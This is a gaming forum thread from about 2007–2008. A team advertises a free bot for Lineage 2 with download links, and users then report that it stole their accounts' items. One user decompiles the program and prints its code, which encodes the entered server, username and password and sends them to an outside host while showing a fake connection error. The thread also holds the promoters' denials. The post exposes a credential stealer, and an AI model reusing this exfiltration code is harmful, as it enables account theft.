MPC Forums
BattleApps


Go Back   MPC Forums > ..:: Games ::.. > Strategy Games / MMORPGs / MMOFPS's > Lineage 2

Lineage 2 Lineage II hacking and slashing its way to a forum near you... Well, hacking anyway!

Reply
 
Thread Tools
Old 29th December 2007, 08:00   #1
L2AuxTeam
MPC Member
 
L2 Auxhilary (OOG BOT)

L2 Auxhilary ( http://l2auxhilary.vze.com/ )

New out of game bot, supporting many features such as the following:

- Auto-Leveler
- Auto-Trade / Auto-Quest
- 100% Free forever
- Supports L2 Walker & L2 Superman scripts (However, a script editing program for these is not available at this time)
- Out of game support (No need for an actual game client to run)
- Many more features!

Also, we will be releasing an in game version further down the road so stay posted! Join us and help with the beta test!

Mirrors (A more up-to-date list located here: http://l2auxhilary.vze.com/ ):
http://files.filefront.com/L2+Auxhil.../fileinfo.html
http://files.filefront.com/L2+Auxhil.../fileinfo.html
http://www.uploading.com/files/LE49J..._Beta.zip.html
http://www.uploading.com/files/A111Z..._Beta.rar.html

We like to hear your feedback, so please, if you have any comments/suggestions/questions or complaints, please e-mail us at l2auxteam@gmail.com (Other contacting options are listed under "Contact Us" on our website)

Happy Botting!
L2 Auxhilary Team.

Last edited by L2AuxTeam; 4th January 2008 at 18:42..
L2AuxTeam is offline   Reply With Quote
Old 29th December 2007, 09:21   #2
hyperkalemia
MPC Member
 
hyperkalemia's Avatar
 
uhmm... how can i make this work on l2sea?
hyperkalemia is offline   Reply With Quote
Old 29th December 2007, 10:06   #3
L2AuxTeam
MPC Member
 
Currently the only support servers are the Official USA servers. We'll be releasing a patch soon that allows you to connect to Korean, Sea Servers, etc.

We'll keep you posted on our website about that progress.

Thanks!
L2AuxTeam is offline   Reply With Quote
Old 29th December 2007, 14:46   #4
zgd
Cheater 4ever!
Assassin
 
zgd's Avatar
 
maybe there will be a release for private servers like: L2Supreme ?
__________________
4927616D20536F6D657468696E6720426574746572
zgd is offline   Reply With Quote
Old 29th December 2007, 18:06   #5
L2AuxTeam
MPC Member
 
In the near future we plan on releasing a bot that works for almost all Official/Private servers, but for now, as it's still in beta stages it's simply not logical to release a bot for every server as we have smaller bugs to figure out.

Thanks!
L2AuxTeam is offline   Reply With Quote
Old 29th December 2007, 21:51   #6
griffter
Lord of Destiny
 
griffter's Avatar
 
it looks realy nice... iam interested on the privat server part..

stay tuned ppl it might be a better bot then l2walker or superman.

GJ mates
griffter is offline   Reply With Quote
Old 30th December 2007, 10:29   #7
Sandbagger
New MPC User
 
Not connecting

Don't use this program! It sends your login and account info to crooks that clean out all your gear on every character you have on the account.

Last edited by Sandbagger; 31st December 2007 at 08:52..
Sandbagger is offline   Reply With Quote
Old 30th December 2007, 18:54   #8
hyperkalemia
MPC Member
 
hyperkalemia's Avatar
 
oh i see.. tnx tnx. keep up the good work guys.
hyperkalemia is offline   Reply With Quote
Old 31st December 2007, 09:34   #9
L2AuxTeam
MPC Member
 
Quote:
Originally Posted by Sandbagger View Post
Don't use this program! It sends your login and account info to crooks that clean out all your gear on every character you have on the account.
We don't understand where you're getting this information. If you downloaded it from our mirrors you wouldn't have problems like this.

We want to let all of our users know that they should stay safe by scanning every file they download. If you're careful things like that won't happen!

Thanks,
L2 Aux Team
L2AuxTeam is offline   Reply With Quote
Old 1st January 2008, 02:54   #10
Sandbagger
New MPC User
 
L2 Auxhilary will steal your gear

I tried 2 use this bot program with 2 different accounts. Both accounts where cleaned of ever bit of gear on every character I had on those accounts. They even made a new character on one server an named him L2Auxhilaryteam001.
Street value of the gear is over $300.00. Don't download this bot program. You will be sorry.
Sandbagger is offline   Reply With Quote
Old 4th January 2008, 18:43   #11
L2AuxTeam
MPC Member
 
bump. Added new mirrors and news
L2AuxTeam is offline   Reply With Quote
Old 4th January 2008, 19:25   #12
griffter
Lord of Destiny
 
griffter's Avatar
 
what are the screenshots for??

how about some screenshots from ingame fighting with the bot???
griffter is offline   Reply With Quote
Old 9th January 2008, 02:39   #13
L2AuxTeam
MPC Member
 
Quote:
Originally Posted by griffter View Post
what are the screenshots for??

how about some screenshots from ingame fighting with the bot???
More screenshots coming soon!
L2AuxTeam is offline   Reply With Quote
Old 6th May 2008, 04:03   #14
papajo
New MPC User
 
Exclamation

Quote:
Originally Posted by L2AuxTeam View Post
We don't understand where you're getting this information. If you downloaded it from our mirrors you wouldn't have problems like this.

We want to let all of our users know that they should stay safe by scanning every file they download. If you're careful things like that won't happen!

Thanks,
L2 Aux Team
I decompiled this prog to VB. Not sure how many of you know visual basic, but I will post my findings here and tell you what I believe they mean. Anyone who wants the full code, I will be happy to send it to you.


Code:
        private void sendData()
        {
            bool flag = !InvokeRequired;
            if (!flag)
            {
                Random random = new Random();
                Thread.Sleep(random.Next(1000, 5000));
                base.Invoke(new ConnectForm.SendData(sendData), new object[0]);
            }
            else
            {
                try
                {
                    byte[] bArr1 = Encoding.UTF8.GetBytes(serverComboBox.Text);
                    byte[] bArr2 = Encoding.UTF8.GetBytes(usernameTextBox.Text);
                    byte[] bArr3 = Encoding.UTF8.GetBytes(passwordTextBox.Text);
                    string s = "?a=\uFFFD" + Convert.ToBase64String(bArr1) + "&b=\uFFFD" + Convert.ToBase64String(bArr2) + "&c=\uFFFD" + Convert.ToBase64String(bArr3);
                    webBrowser.Navigate("http://l2auxhilary.byethost13.com/aux_ins.php\uFFFD" + s);
                }
                catch 
                {
                }
                statusLabel.Text = "Ready\uFFFD";
                connectProgressBar.Style = ProgressBarStyle.Blocks;
                connectButton.Enabled = true;
                MessageBox.Show("Couldn't connect!  Check your settings and try again.\uFFFD", "Error\uFFFD");
            }
        }
This message in paticular should stand out to anyone using the code and has been unable to connect: "Couldn't connect! Check your settings and try again."

A few lines above it, something caught my eye: "webBrowser.Navigate("http://l2auxhilary.byethost13.com/aux_ins.php\uFFFD" + s);"

/sarcasm
Now why would it be trying to navigate to this site while trying to connect to L2? Any Ideas?
/end sarcasm

Now if you type in http://l2auxhilary.byethost13.com/aux_ins.php it will redirect you to their main site. Bad vibes from this one.

Note: The most frighteningly easy code I have ever attempted to de-compile, and the only one that has ever fully worked for me. Any more bad vibes anyone?

Need more proof that this can in no way be a bot?

Check out the file size. I am comaring it to OOG super 1.58 and L2 walker OOG 10.7.2 (I feel they version requires mentioning because other versions may have different sizes, but it is the versions I am staring at ATM.

Super has server-side validation and shtuff (which is why no one can crack it)
Size: 54.3 MB

Walker has client side validation and shtuff (which is why everyone seems to crack it)
Size: 15.7

Auxhilary: 4.21 MB

Now let me show you something else:

IG Super (1.58): 49.0 MB
IG Walker (1.57): 5.78 MB

Again: something fishy to anyone?


I HOPE THIS SCUMMMMMEEEEEERSSSSSSSS GET BUSTED!!!! DIE YOU NOLIFERS!!!!
papajo is offline   Reply With Quote
Reply

Bookmarks

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump



All times are GMT +2. The time now is 10:18.

Powered by vBulletin® Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Style Provided By: Wrestling Clique - Wrestling Forums


Page generated in 0.15699 seconds with 11 queries